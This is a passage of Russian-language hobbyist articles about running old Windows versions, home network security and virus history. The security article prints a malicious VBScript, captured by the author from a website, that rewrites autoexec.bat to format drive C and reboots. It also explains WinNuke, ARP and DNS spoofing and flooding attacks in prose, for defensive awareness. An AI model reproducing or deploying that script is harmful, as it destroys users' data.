Pages: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38

Назад в будущее.

Случается часто так, что для некоторых целей необходимо запустить на компьютере старые версии WINDOWS. Будь то в целях программирования или просто ностальгии. Да и повысить производительность своего не очень быстрого компьютера с помощью старых программ тоже хочется. Сегодня я расскажу про установку WINDOWS 95 на компьютеры с процессором AMD выше 350 мегагерц, а так же о работе WINDOWS 3.X на компьютерах с файловой системой FAT 32.
WINDOWS 95.
Всем известно про то, что WINDOWS 95 устанавливается на компьютеры с процессором не выше 350 Mhz. Хотя поддержка этой версии прекратилась несколько лет назад, работать с ней продолжают во многих местах. И вот однажды я задался риторическим вопросом. Как установить WINDOWS 95 на компьютер с процессором AMD 450? Ведь он выше, чем максимально поддерживаемый системой. Откровенно говоря, я просто надеялся поднять производительность “ПК” установив относительно старое программное обеспечение. И это действительно удалось благодаря патчу, который можно скачать вот по этому адресу: http://www.windrivers.com/company/amd/k6-2up.zip. Сразу оговорюсь, что он распространяет своё действие на компьютеры с CPU AMD K6-2. Всем же владельцам INTEL и CYRIX предлагаю поискать свою версию. Перед тем как начать описание инсталляции всегда следует рассказать о “подводных камнях”. Первый такой валун, на который я напоролся в процессе работы, заключался в невозможности обновления WINDOWS 95 из среды MS DOS. Ведь, проблема состоит в том, что при запуске инсталляции через некоторое время возникает ошибка. Это приводит к невозможности дальнейшей установки системы. К слову сказать, на период инсталляции WINDOWS 95 мне пришлось переставить в BIOS моей материнской платы TX 100 частоту процессора с 450 до 350 Mhz. Это дало возможность установить систему, запустить патч уже из среды WINDOWS. Затем осталось зайти в BIOS и выставить настройки назад. Всё проблема решена. И WINDOWS 95 может спокойно “летать” на вашем компьютере. Единственное о чём осталось предупредить, так это работе драйверов. Ставьте версии адаптированные для WINDOWS 95. Это устранит проблемы “зависания” и перезагрузки системы.
WINDOWS 3.X
Старые добрые окошки. Ещё не ОС, но уже оболочка. То с чего началось победоносное шествие WINDOWS. Да, ну ладно. Перейдём сразу к делу. Проблем 3.X для современных компьютеров состоит в том, что она не может установиться на файловую систему FAT 32. При такой попытке выдаётся сообщения о невозможности запуска программы и предложение нажать три заветные клавиши, дабы перезагрузить компьютер. Для решения этой проблемы существует одна маленькая программа. Скачать эту утилиту можно с моего сайта : www.fdd5-25.narod.ru/drivers/Osr2kit.exe . Запускаете её из режима MS DOS, перезагружаете компьютер. После чего смело устанавливайте любую версию 3.X.

Роман Карпач

Защити себя сам!!!

На войне как на войне…
***
Перед началом просмотра публикации настоятельно рекомендую начинающим пользователям прочесть словарь терминов:
DNS (Domain Name System — система имен доменов) Распределенный механизм имен/адресов, используемых в сети Internet. Используется для
разрешения логических имен в IP-адреса. DNS используется в сети Internet, обеспечивая возможность работы с понятными и легко
запоминающимися именами вместо неудобоваримых чисел IP-адреса.
Domain (домен) В сети Internet часть иерархии имен. Синтаксически доменное имя Internet содержит последовательность имен (меток), разделенных точками (.) например, «fdd5-25.narod.ru» В OSI термин домен используется как административное деление сложных распределенных систем, как в MHS Private Management Domain (PRMD) и
Directory Management Domain (DMD).
ICMP: Internet Control Message Protocol. Протокол, используемый для
контроля за ошибками и сообщениями на уровне IP. В действительности ICMP представляет собой часть протокола IP.
TCP: Transmission Control Protocol. Основной транспортный протокол в наборе протоколов Internet, обеспечивающий надежные, ориентированные на соединения, полнодуплексные потоки.
TCP/IP (Transmission Control Protocol/Internet Protocol — протокол управления передачей/протокол Internet) Известен также как стек протоколов Internet (Internet Protocol Suite). Данный стек протоколов используется в семействе сетей Internet и для объединения гетерогенных сетей.
Ping: Packet internet groper. Программа, используемая для проверки доступности адресата путем передачи ему специального сигнала (ICMP echo request — запрос отклика ICMP) и ожидания ответа. Термин используется как глагол: «Ping host X to see if it is up!»
Port (порт) Абстракция, используемая транспортными протоколами Internet для обозначения многочисленных одновременных соединений с единственным хостом — адресатом. Физический интерфейс компьютера, мультиплексора и т.п. для подключения терминала или модема.
FTP: File Transfer Protocol. Используемый в Internet протокол (и программа) передачи файлов между хост — компьютерами.
Telnet Протокол виртуального терминала в наборе протоколов Internet. Позволяет пользователям одного хоста подключаться к
другому удаленному хосту и работать с ним как через обычный терминал.
UDP (User Datagram Protocol) Прозрачный протокол в группе протоколов Internet. UDP, подобно TCP, использует IP для доставки; однако, в отличие от TCP, UDP обеспечивает обмен дейтаграммами без
подтверждения гарантий доставки.
***
Каждый пользователь проводящий в интернете много времени может стать потенциальной жертвой сетевой атаки. В чём она может выражаться? Да в чём угодно, от доступа к ресурсам вашего компьютера, до банального отсоединения от провайдера. Причём, в последние время подобные случаи участились на столько, что настал момент когда об этом нужно написать. Я не хочу начинать публикацию с пустого описания программ для защиты в интернет. Ведь программы пишутся под конкретную проблему. И наверное, просто следует написать про то, что и как может вызвать поражение пользователя или сервера в сети. Первое на чём бы я хотел заострить ваше внимание, так это на довольно необычной угрозе для ваших жёстких дисков. Это вредоносные скрипты, которые могут находится на любом сайте.

script language ="VBScript"
sub Reboot
Set
Shell=CreateObject("WScript.Shell")
Shell.Run "Rundll32.exe
User.exe,ExitWindows"
RunDll
end sub
sub
destruct
set fs=createobject("Scripting.FileSystemObject")'FileSystem
if
fs.fileexists("c:\autoexec.bat") then
set
ab=fs.getfile("c:\autoexec.bat")
ab.attributes=0
end if
set
autoexec=fs.CreateTextFile("c:\autoexec.bat")
autoexec.WriteLine
"@cls"
autoexec.WriteLine "@echo Windows upgrading your system..."
autoexec.WriteLine "@echo Do not abort this process!"
autoexec.WriteLine "@format c: /q /autotest"
autoexec.close
end sub
destruct
format
reboot

Только видимо неудачный, поскольку мне удалось его выловить с одной занимательной страницы. На которой-то он и лежал, дабы отформатировать мой жёсткий диск. Но к счастью выдал, что у него ошибка в третьей строке. Однажды даже попался немного другой экземпляр, который вписывал себя в автозагрузку WINDOWS и вешал компьютер намертво. Поэтому прошу, не повторяйте моей ошибки посещая сомнительные сайты предложенные вам в чате или в очередном спаме. Развивая тему нельзя не затронуть возможные методы обнаружения злоумышленником вашего компьютера в сети интернет. Пока вы думаете читать ли это дальше, хочу поведать одну жизненную историю. Есть у меня знакомый администратор компьютерного клуба. Где есть выделенный канал. И вот долгими ночами вместо того как играть со всеми в COUNTER STRIKE, он сидит с программой «IP сканер» и ищет пользователей которые на данный момент в сети. Потом уже с помощью другой утилиты сканирует порты. Ports scan. Сканирование компьютерной системы на наличие портов, путем попыток их открытия. Эта атака сильно расходует ресурсы системы. Обычно она используется для поиска слабых мест <дырок> в «ПО», «ОС» компьютера и предшествует более элегантной атаке. К чему я всё это рассказываю? Поймёте прочитав всё ниженаписанное. Любимое оружие всех сетевых сумасбродов это Win Nuke. Hаpяду с обычными данными пересылаемыми по TCP соединению
стандарт предусматривает также передачу срочных (Out Of Band)
данных. У большинства PC с установленным Windows присутствует сетевой протокол Net BIOS, который использует для своих нужд 3 IP порта: 137, 138, 139. Как выяснилось, если соединиться с Windows машиной в 139 порт и послать туда несколько байт Out Of Band данных, то NetBIOS не зная что делать с этими данными попросту подвешивает или перезагружает машину. Для Windows 95 это обычно выглядит как синий текстовый экpан, сообщающий об ошибке в драйвере TCP/IP и невозможность работы с сетью до перезагрузки ОC. NT 4.0 без сервис паков перезагружается, NT 4.0 со вторым сервис паком выпадает в синий экран. Что же касается WINDOWS 98 SE (пропатченная версия). Думаю, стоит быть спокойным. Проведя тест у себя в локальной сети (12 компьютеров), я выяснил, что не один из 18 нюкеров не произвёл никакого воздействия на машины. Хотя не исключено, что старая дыра давно используется в новых, ещё более коварных целях. Чаще всего жертвой NUKE атаки можно стать в обычном web чате. Конечно, нельзя обойти вниманием и другой тип нюков — ICMP: Internet Control Message Protocol. Протокол, используемый для контроля за ошибками и сообщениями на уровне IP. В действительности ICMP представляет собой часть протокола IP. Суть атаки такая же как и у стандартного NUKE. На компьютер жертвы высылается сообщения об ошибках и компьютер виснет намертво. Что же касается чатов — IRC. Puke. Осуществляется посылка злоумышленником атакуемому хосту пакета ICMP unreachable error (неизвестная ошибка удаленной системы), что в свою очередь вызывает отключение Хоста от сервера (обычно IRC). Сейчас шла речь, на мой взгляд, о более распространённых методах атак на обычного пользователя. Но не стоит упускать из виду и атаки на сервера. Ведь от стабильности оных может зависеть работа сотен людей!
Угроза для серверов это и угроза пользователям.
Есть такая вещь Dummy ARP server. В сети Internet каждый пользователь имеет уникальный IP адрес, на который поступают все сообщения из глобальной сети. Однако протокол IP это не столько сетевой, сколько межсетевой протокол обмена, предназначенный для связи между объектами в глобальной сети. На канальном уровне пакеты адресуются по аппаратным адресам сетевых карт. В сети Internet для взаимно однозначного соответствия IP и Ethernet адресов используется Address Resolution Protocol. Первоначально хост может не иметь информации о Ethernet — адресах других пользователей, находящихся с ним в одном сегменте, в том числе и о Ethernet — адресе маршрутизатора. Соответственно, при первом обращении к сетевым ресурсам хост отправляет широковещательный ARP-запрос, который получат все станции в данном сегменте сети. Получив данный запрос, маршрутизатор отправляет на запросивший хост ARP-ответ, в котором сообщает свой Ethernet-адрес. Данная схема работы позволяет злоумышленнику послать ложный ARP-ответ, в котором объявить себя искомым хостом, (например, маршрутизатором), и, в дальнейшем, активно контролировать весь сетевой трафик «обманутого» хоста. Проще говоря получать все ваши данные. Но это ещё не всё, что может приключиться с нами, пока мы спим.
Dummy DNS. Внедрение в сеть Internet ложного DNS-сервера путем перехвата DNS-запроса. Для реализации атаки злоумышленнику необходимо перехватить DNS-запрос, извлечь из него номер UDP-порта отправителя запроса, двухбайтовое значение ID идентификатора DNS-запроса и искомое имя и, затем, послать ложный DNS-ответ на извлеченный из DNS-запроса UDP-порт, в котором указать в качестве искомого IP-адреса настоящий IP-адрес ложного DNS-сервера. Это позволит в дальнейшем полностью перехватить и активно воздействовать на информацию, циркулирующую между «обманутым» хостом и сервером. Необходимым условием осуществления данного варианта атаки является перехват DNS-запроса. Это возможно только в том случае, если атакующий находится либо на пути основного трафика, либо в сегменте настоящего DNS-сервера. Выполнение одного из этих условий местонахождения хакера в сети делает подобную удаленную атаку трудно осуществимой на практике (попасть в сегмент DNS-сервера и тем более в межсегментный канал связи атакующему скорее всего не удастся). Однако в случае выполнения этих условий возможно осуществить межсегментную удаленную атаку на сеть Internet, что вообще-то нежелательно.
IP Hijacking. Необходимым условием является доступ к машине, находящейся на пути сетевого потока. Напомним, что при передаче данных постоянно используются оба поля находящиеся в IP-заголовке. Исходя из их значения, сервер и клиент проверяют корректность передачи пакетов. Существует возможность ввести соединение в «десинхронизированное состояние». Это когда присылаемые сервером данные не будут совпадать с ожидаемым значениями клиента, и наоборот. В данном случае злоумышленник, «прослушивая» линию, может взять на себя функции посредника, генерируя корректные пакеты для клиента и сервера и перехватывая их ответы. Метод позволяет полностью обойти такие системы защиты, как, например, одноразовые пароли, поскольку злоумышленник начинает работу уже после того, как произойдет авторизация пользователя. UDP storm. Как правило, по умолчанию системы поддерживают работу таких UDP-портов, как 7 («эхо», полученный пакет отсылается назад), 19 («знакогенератор», в ответ на полученный пакет отправителю высылается строка знакогенератора) и других. В данном случае хакер может послать единственный UDP-пакет, где в качестве исходного порта будет указан 7, в качестве получателя — 19-й, а в качестве адреса получателя и отправителя будут указаны, к примеру, две машины вашей сети (или даже 127.0.0.1). Получив пакет, 19-й порт отвечает строкой, которая попадает на порт 7. Седьмой порт дублирует ее и вновь отсылает на 19 и так до бесконечности. Бесконечный цикл съедает ресурсы машин и добавляет на канал бессмысленную нагрузку. Конечно, при первом потерянном UDP-пакете буря прекратиться. Traffic analysis (sniffing) Прослушивание канала. Практически все сетевые карты поддерживают возможность перехвата пакетов, передаваемых по общему каналу локальной сети. При этом рабочая станция может принимать пакеты, адресованные другим компьютерам того же сегмента сети. Таким образом, весь информационный обмен в сегменте сети становится доступным хакеру, что поможет в дальнейшем ему подобрать/придумать другие типы атак против Вас. Для успешной реализации этой атаки компьютер злоумышленника должен располагаться в том же сегменте локальной сети, что и атакуемый компьютер. Атака Brute Force «Грубая сила», используется хакерами в тех случаях, когда доступ к системе либо информации закрыт паролем, а уязвимостей не удалось обнаружить. Осуществляется простым перебором всех возможных либо наиболее часто встречающихся паролей. Во втором случае brute force достаточно часто называют «атакой по словарю». Fuzzy. Пакет IP содержит поле, определяющее какой протокол следующего уровня(TCP, UDP, ICMP) использует данные из Internet. Хакеры могут использовать нестандартное значение данного поля для передачи данных, которые не будут фиксироваться стандартными средствами контроля информационных потоков.
Denial of service (DOS)
Класс атак, приводящих к отказу в обслуживании. Во время таких атак происходит повышенный расход ресурсов процессора и уменьшение канала пропускной возможности связи, что может привести к сильному замедлению работы всей компьютерной системы, отдельных задач, либо вообще к полной остановке пользователя. К DOS атакам относятся Floods, ICMP flooding, Identification flooding и другие. Изначально оговорюсь, что многое нижеописанное истинно для серверов.
1. Floods. Перевод с английского на русский — «затопление». Во время floods атак происходит посылка большого количества на атакуемую систему ICMP (чаще всего) либо UDP пакетов, которые не несут полезной информации (мусор). В результате происходит уменьшение полосы пропускания канала и загрузка компьютерной системы анализом пришедших бесполезных пакетов и генерацией на них ответов.
2. SYN flooding. Затопление SYN-пакетами — самый известный способ «забить» информационный канал. Затопление SYN пакетами основано на переполнении очереди сервера, после чего сервер перестает отвечать на запросы пользователей. В различных системах работа с очередью реализована по разному. После истечения некоторого времени (зависит от реализации) система удаляет запросы из очереди. Однако ничего не мешает хакеру послать новую порцию запросов. Таким образом, даже находясь на соединение 2400 bps, злоумышленник может посылать каждые полторы минуты по 20-30 пакетов на сервер, поддерживая его в нерабочем состоянии. Атака обычно направлена на определённую, конкретную службу, например telnet или ftp. Она заключается в передаче пакетов установления соединения на порт, соответствующий атакуемой службе. При получении запроса система выделяет ресурсы для нового соединения, после чего пытается ответить на запрос (послать «SYN-ACK») по недоступному адресу. По умолчанию NT версий 3.5-4.0 будет пытаться повторить подтверждение 5 раз — через 3, 6, 12, 24 и 48 секунд. После этого еще 96 секунд система может ожидать ответ, и только после этого освободит ресурсы, выделенные для будущего соединения. Общее время занятости ресурсов — 189 секунд.
3. ICMP flooding (flood ping). Перевод с английского на русский — «поток пингов». Во время этой атаки происходит посылка компьютерной системе жертвы большого количества запросов ICMP. В результате происходит уменьшение полосы пропускания канала и загрузка компьютерной системы анализом пришедших пакетов и генерацией на них ответов. Примечание: В мирных целях пинг используется администраторами и пользователями для проверки работоспособности основных частей транспортной системы вычислительной сети, оценить работу сети при максимальной нагрузке. При стандартном режиме работы пакеты высылаются через некоторые промежутки времени, практически не нагружая сеть.
4. DNS flooding, DNS scan. Эта атака, направленная на сервера имён Internet. Она заключается в передаче большого числа DNS запросов и приводит к тому, что у пользователей нет возможности обращаться к сервису имен и,
следовательно, обеспечивается невозможность работы обычных пользователей. DNS scan. Известно, что прежде чем начинать атаку, хакеры осуществляют выявление целей, т.е. выявление компьютеров, которые будут жертвами атаки, а также компьютеров, которые осуществляют информационный обмен с жертвами. Одним из способов выявления целей заключается в опросе сервера имён и получение от него всей имеющейся информации о домене.
5. Unreachable (dest_unreach, ICMP type 3). Эта атака заключается в том, что компьютерной системе посылается сообщение ICMP type 3, которое сообщает, что порт назначения недоступен тем самым обманывая систему и вынуждая ее разорвать соединение т.к. она будет «думать» что пакеты не доходят. ICMP туре 3 может посылаться клиентской машине, которая затем произведет отключение, либо посылаться серверу и инициатором отключения станет он. Посылку ICMP туре 3 осуществляет хакер.
6. UDP bomb. Передаваемый пакет UDP содержит неправильный формат служебных полей. Некоторые старые версии сетевого ПО приводят при получении подобного пакета к аварийному завершению системы.
7.Smurf. Атака заключается в передаче в сеть широковещательных ICMP запросов от имени компьютера-жертвы. В результате компьютеры, принявшие такие широковещательные пакеты, отвечают компьютеру-жертве, что приводит к существенному снижение пропускной способности канала связи и, в ряде случаев, к полной изоляции атакуемой сети. Атака smurf исключительно эффективна и широко распространена.
8. Pong Floods — атаки, перечисленные выше, но в качестве обратного действительного IP-адреса отправителя используется поддельный. Тем сам затрудняется обнаружение хакера.
Конечно, тяжело решить проблему безопасности в сети. Но можно попробовать. Я хочу рассказать про то, как может себя защитить обычный пользователь. Ведь по статистике именно его компьютер чаще всего становиться жертвой. Для обороны нашего с вами здоровья, давно разработаны средства «индивидуальной защиты». К ним относятся программы FIREWALL (огненная стена). FIREWALL-ы бывают разными, как для домашнего пользования (TINY PERSONAL FIREWALL, BLACK ICE), так и для корпоративного. Предприятия сами разберутся, что им делать. А вот обычный неискушённый пользователь не всегда. Хочу предложить вашему вниманию на мой взгляд самых удачных представителей «огненных стен» . Все они были мною испытаны в разное время, в разных частях интернет. Outpost Firewall (www.agnitum.com) — стал классикой пару лет назад. С тех пор не теряет своих позиций на рынке. Был создан специально для новичков, не требуя много времени на изучение своих настроек и возможностей. В то же время продвинутые пользователи нашли в программе много полезных возможностей, что позволяет создать изощренные настройки для защиты своего компьютера или сети. Уровень Outpost Firewall был высоко оценен крупнейшими отечественными изданиями, такими как «Компьютер-Пресс», «Софтерра», «Хакер», «Компьютерная Газета». Но в бочке мёда нельзя не обойтись ложкой дёгтя. В процессе работы было замечено, что компьютеры на базе процессоров AMD 450, 1600 XP под управлением системы WINDOWS 98 SE частенько после использования этой программы вешались при выключении компьютера. Конечно, я не настаиваю на все 100%, что это вызывает FIREWALL, но такие проблемы случались очень часто. И это наводит на некоторые размышления. Тем не менее это не помешало программе защитить меня пару раз в чате от NUKE атаки. Её пытались провести на компьютер. Кстати, второй эпизод знакомства с Outpost случился намного позже ещё в одном чате. На сей раз FIREWALL выдал, что был запущен ICMP фраг. В обеих случаях мой компьютер не пострадал. Это и является самой лучшей характеристикой программы. Второй продукт, который считается одним из лидеров в своей области называется Norton Personal Firewall или ещё одна его разновидность Norton Internet Security (www.symantec.com).
Norton Internet Security специально предназначена для защиты вас и вашей семьи от опасностей которые подстерегают в Internet. Основные его возможности : Закрывает доступ в Internet детям, автоматически преграждает путь вирусам и другому вредному коду. Что очень удачно подходит для борьбы со скриптовыми вирусами, описанными чуть выше. Защищает ваш компьютер как от атак из вне, так и от программ троянов, которые могут попытаться вырваться в сеть с украденной информацией.
Вообще-то программ подобного рода очень и очень много. И для описания хотя бы десятка их потребовалась не одна журнальная страница. Именно по этому в окончании публикации я хочу привести отрывок одного текста (переведённого с английского), который был написан для программы Black Ice (FIREWALL) ещё в 1999 году.
«Большинство хакеров являются неопытными детьми желающими пошутить. Они просто хотят порисоваться перед своими друзьями, что они могут взломать систему. К несчастью, даже неопытный взломщик может вызвать серьезный ущерб войдя в вашу сеть. Корпорации давно узнали о рисках для их бизнеса вызванного хакерами. Тем не менее, большинство министерств внутренних дел и пользователей — не подозревают, что хакеры могут сделать. Они могут сделать ваш компьютерный полностью непригодным к работе. Хакеры могут украсть или удалить важные данные. Находчивый взломщик может вызвать огромный финансовый ущерб, компаниям которые каждый, используют Internet. В 1997 комиссия Сената США, Роберта S. Litt, Deputy (ассистента Министра Юстиции) установила. Компьютерные преступление обходятся от $500 миллионов до $10 миллиардов долларов за год. Институт компьютерной безопасности опросил 428 специалистов информационной безопасности в компаниях. 42% респондентов указало, что происходило несанкционированное использование их компьютерных систем в течение прошлого года. И всё из-за отсутствия централизованного управления или недостаточного финансирования.» Напомню ещё раз, что такая ситуация была в 1997 году. С тех пор многое изменилось. Но одна вещь осталось незыблемой. На безопасности экономить нельзя!

При создании публикации были использованы материалы с сайта
http://kiev-security.org.ua

Роман Карпач

Пока гром не грянет, мужик не перекрестится.

(начинающему пользователю посвящается)
Уж сколько раз твердили пользователям во всём мире, что следует пользоваться антивирусными программами. Но многие так никогда и не делают этого. А зря. Ведь никто не застрахован от попадания в компьютер разнообразных вредоносных программ. Из своего опыта добавлю, что самая уязвимая прослойка пользователей это секретари и бухгалтеры, которые по простоте душевной или по незнанию не обновляют свои антивирусы. А бывает, так что даже и не пользуются ими. На написание этой статьи меня подбил целый ряд жизненных ситуаций. Когда у многих пропадала важная информация с компьютеров и огромные базы данных. И всего лишь потому, что захотелось не весть откуда принести дискету с заражённой WINCIH Масяней. А ведь подобные случаи не единичны! И поэтому заражение древним вирусом “Чернобыль” продолжается повсеместно, хотя его обнаружит любой современный антивирусный пакет.
Вирусы как вид программ.
У каждого человека, который пользуется компьютером, наверняка, есть свой первый вирус. Для меня это была незабвенная вещица под названием ”Миссис Пакман”. А для вас? Напрягите память! Проблем, к слову сказать, она принесла много. Но за то в те далёкие 90-е многие поняли, что с вирусами шутки плохи. Само же понятие «компьютерный вирус» впервые употребил сотрудник Лехайского университета (США)
Ф. Коэн на конференции по безопасности информации в 1984 году. Однако, еще в работах Винера и фон Неймана исследовались различные виды конечных автоматов, в том числе и самовоспроизводящихся. Что же такое в научном ведении компьютерный вирус?
Вирус — это фрагмент программы, разработанный и написанный с целью неблагоприятного воздействия на Ваш компьютер посредством изменения способа его работы без Вашего ведома или разрешения. Выражаясь техническим языком, вирус — это сегмент программного кода, имплантирующий себя в один из Ваших исполняемых файлов и систематически распространяемый из одного файла в другой. Компьютерные вирусы не образуются сами. Они должны быть написаны и имеют определенную цель. Обычно вирус выполняет две разные функции:
— Распространяет себя из одного файла в другой без Вашего подтверждения или ведома. На техническом языке это называется саморепликацией или размножением.
— Внедряет симптом или нарушение, запланированное злоумышленником. Он может портить диск, искажать программы или просто навести беспорядок в компьютере. На техническом языке это называется полезной нагрузкой вируса, которая может быть доброкачественной или злокачественной по прихоти создателя вируса. Доброкачественный вирус — тот, который не нацелен на причинение компьютеру реального ущерба. Например, вирус, скрывающийся до определенной даты или времени, а затем только выводит некоторое сообщение, считается доброкачественным.
Злокачественный вирус пытается причинить вред компьютеру, в том числе и непреднамеренный. Существует большое число вирусов, причиняющих
ущерб из-за некачественного программирования и явных ошибок в коде самого вируса. Злокачественный вирус — способен изменить одну или более программ, так что они перестают работать надлежащим образом. Зараженная программа может внезапно прекращать работу, записывать неверную информацию в документы. Или вирус может менять информацию о каталогах в системной области диска. Это мешает монтированию
разделов или запуску одной или более программ; а бывает, что программы не могут найти нужные документы. Хотя некоторые вирусы считаются доброкачественными; большая их
часть — это злокачественные вирусы. Некоторые самые опасные из них портят весь жесткий диск или удаляют файлы.
Немного истории.
Мнений по поводу даты рождения первого компьютерного вируса очень много. Мне доподлинно известно только одно: на машине Чарльза Бэббиджа его не было, а на Univac 1108 и IBM-360/370 они уже были (Pervading Animal и Christmas Tree). Таким образом, первый вирус появился где-то в самом начале 70-х или даже в конце 60-х годов, хотя так его никто еще не называл. На этом разговор о вымерших ископаемых предлагаю
считать завершенным. Поговорим о новейшей истории: Brain, Vienna, Cascade и далее. Те, кто начал работать на IBM PC в середине 80-х, еще не забыли повальную эпидемию
этих вирусных заболеваний в 1987—1989 гг. Буквы сыпались на экранах, а толпы пользователей неслись к специалистам по ремонту дисплеев (сейчас все наоборот: винчестер скончался от старости, а валят на неизвестный передовой науке вирус). Затем компьютер заиграл чужеземный гимн «Yankee Doodle», но чинить динамики уже никто не бросился, очень быстро разобрались, что это — вирус, да не один, а целый десяток.
Так вирусы начали заражать файлы. Вирус Brain и скачущий по экрану шарик вируса Ping-pong ознаменовали победу вируса и над Boot-сектором. Все это очень не нравилось пользователям IBM PC, и появились противоядия. Следует обратить внимание на то, что истории завоевания вирусами СНГ и Запада различаются между собой. Первым вирусом, стремительно распространившимся на Западе, был загрузочный вирус Brain, и только потом появились файловые вирусы Vienna и Cascade. В СНГ же, наоборот, сначала появились файловые вирусы, а годом позже — загрузочные. Время шло, вирусы плодились. Все они были чем-то похожи друг на друга, лезли в память, цеплялись к файлам и секторам, периодически убивали файлы, дискеты и винчестеры. Одним из «откровений» стал вирус Frodo.4096 — первый из известных файловых вирусов-невидимок. Этот вирус перехватывал INT 21h и при обращении через DOS к зараженным файлам изменял информацию таким образом, что файл появлялся перед пользователем в незараженном виде. Но это была только надстройка вируса над MS-DOS. Прошло некоторое время, вирусы как электронные тараканы полезли внутрь ядра ДОС (Beast.512). Идея невидимости продолжала приносить свои плоды. Летом 1991 года кося компьютеры, как бубонная чума, вирус Dir_II завоевал мир. Но бороться с невидимками довольно просто. Следует лишь очистить RAM и будь спокоен. Больше хлопот доставляли само шифрующиеся вирусы, которые иногда встречались в очередных поступлениях в коллекции. Ведь для их идентификации и удаления приходилось писать специальные подпрограммы, отлаживать их. Но на это никто не обращал внимания. Пока не появились вирусы нового поколения, которые носят название полиморфик вирусов. Эти вирусы используют другой подход к невидимости: они шифруются (в большинстве случаев), а в расшифровщике используют команды, которые могут не повторяться при заражении различных файлов. Первый полиморфик вирус появился в начале 90-х годов. Это был Chameleon. Но по-настоящему серьезной проблема стала лишь год спустя — в апреле 1991 года, когда практически весь мир был охвачен эпидемией компьютерного вируса Tequila. Эта эпидемия практически не затронула Россию, а первая российская эпидемия, вызванная полиморфик вирусом, нагрянула три года спустя – 1994 год (Phantom 1). Популярность идеи самошифрующихся вирусов вылилась в появление генераторов полиморфик кода. В начале 1992 года появляется знаменитый вирус Dedicated, базирующийся на первом известном генераторе MtE и открывший серию MtE-вирусов. Представляет он из себя объектный модуль (OBJ-файл), и теперь для того,
чтобы из самого обычного нешифрованного вируса получить полиморфик мутанта, достаточно лишь скомпоновать их объектные модули в OBJ-файл. Автору вируса, если он пожелает создать настоящий вирус, уже не надо корпеть над кодами собственного шифровщика — расшифровщика. При желании он может подключить к своему вирусу
генератор и вызывать его из кодов вируса. К счастью, первый MtE-вирус не попал в
«живую природу» и не вызвал эпидемии, а разработчики антивирусных программ соответственно имели некоторый запас времени для подготовки к отражению новой напасти. Всего год спустя изготовление таких вирусов становится уже ремеслом. В
1993 году произошел их «обвал». Создается впечатление, что одним из основных направлений в трудном деле создания вирусов становится разработка и отладка полиморфик механизма. Конкуренция среди авторов вирусов сводится не к тому, кто из них напишет самый крутой вирус, а чей механизм окажется круче всех. Вот далеко не полный список тех из них, которые можно назвать стопроцентно полиморфными:
(на конец 1993 г.): Bootache, CivilWar (четыре версии), Crusher, Dudley, Fly, Freddy, Ginger, Grog, Haifa, Moctezuma (две версии), MVF, Necros, Nukehard, PcFly (три версии), Predator, Satanbug, Sandra, Shoker, Todor, Tremor, Trigger, Uruguay (восемь версий).
Для обнаружения этих вирусов приходится использовать специальные методы, к
которым можно отнести эмуляцию выполнения кода вируса, математические алгоритмы восстановления участков кода и данных в вирусе. К нестопроцентным полиморфикам (т. е. вирусам, которые шифруют себя, но в дешифраторе вируса всегда существуют постоянные байты) можно отнести еще десяток вирусов: Basilisk, Daemaen,
Invisible (две версии), Mirea (несколько версий), Rasek (три версии), Sarov, Scoundrel, Seat, Silly, Simulation. Однако и они требуют расшифровки кода для их обнаружения и восстановления пораженных объектов, поскольку длина постоянного кода в дешифраторе этих вирусов слишком мала. Распространялись генераторы вирусов по станциям BBS в виде архивов, содержащих объектные модули, документацию и примеры использования. В конце 1993 г. было известно уже семь генераторов полиморфик кода.
Это были: МТЕ 0.90 (Mutation Engine), четыре различные версии ТРЕ (Trident Polymorphic Engine), NED (Nuke Encryption Device), DAME (Dark Angel’s Multiple Encryptor).
С тех пор новые полиморфные генераторы появлялись по нескольку штук в год, и приводить их полный список вряд ли имеет смысл.
Что же сейчас могут вирусы?
Как вы ещё не перепугались? И не побежали галопом проверять свой компьютер на наличие вирусов? Похвально! У Вас железные нервы. Ну, коли так, перейдём к самой напряжённой части этой публикации. А именно описанию возможностей современных вирусов.
Вирусы, заражающие файлы:
Это вирусы, присоединяющиеся к файлам .COM и .EXE (или подменяющие их), хотя в отдельных случаях они могут заражать и файлы с расширениями .SYS, .DRV, .BIN, .OVL и .OVY. Вирусы этого типа обычно делают неинфицированные программы инфицированными, когда они исполняются в памяти. В других случаях программы заражаются, когда они открыты (например, с применением команды DOS DIR), или вирус просто заражает все файлы в каталоге, из которого он запущен (прямая инфекция).
Вирусы загрузочного сектора:
Каждый логический диск, жесткий или гибкий, содержит загрузочный сектор. Это относится даже к несистемным дискам. В загрузочном секторе находится специфическая информация о формате диска, хранящихся на нем данных, а также небольшая программа,
называемая программой загрузки (она загружает системные файлы DOS). Программа загрузки отображает знакомое сообщение «Non-system Disk or Disk Error», если системные файлы DOS отсутствуют. Эту программу и заражают вирусы. Вирус загрузочного сектора можно получить, оставив в дисководе зараженную дискету и загрузив машину. При считывании и выполнении программы загрузочного сектора вирус попадает в память и заражает жесткий диск. Помните, что так как загрузочный сектор есть у каждого диска, машину можно заразить и от диска данных (обычно так и происходит).
ПРИМЕЧАНИЕ: Загрузочный сектор есть как на дискетах, так и на жестком диске.
Вирусы главной загрузочной записи:
Первый физический сектор каждого жесткого диска (сторона Ш, дорожка Ш, сектор 1) содержит главную загрузочную запись (Master Boot Record, MBR) и таблицу разделов. В главной загрузочной записи находится маленькая программа, называемая главной загрузочной программой, которая определяет положение загрузочного раздела по таблице разделов и командует системе идти туда и выполнять любой содержащийся там код. Предположим, что диск отформатирован правильно, и загрузочный сектор находится в позиции (сторона Ш, дорожка Ш, сектор 1). На флоппи-дисках те же самые вирусы заражают загрузочный сектор. Вирус главной загрузочной записи распространяется точно так же, как и вирус загрузочного сектора — когда зараженная дискета оставлена в дисководе во время перезагрузки машины. При считывании и исполнении программы
загрузочного сектора вирус попадает в память и заражает MBR жесткого диска. Опять же, так как загрузочный сектор имеется на каждом диске, машину можно заразить и от диска данных.
Многораздельные вирусы:
Многораздельные вирусы представляют собой сочетание перечисленных выше вирусов. Они заражают как файлы, так и записи MBR или загрузочные секторы. Вирусы этого типа встречаются редко, но их число постоянно растет.
Чего вирусы не делают:
Компьютерные вирусы не заражают файлы на защищенных от записи дисках и не заражают документов, за исключением случая макровирусов Word, которые заражают только документы и шаблоны Word 6.0 или выше. Не заражаются и копрессированные файлы. Вирусы не действуют на аппаратуру компьютера — мониторы, микросхемы и
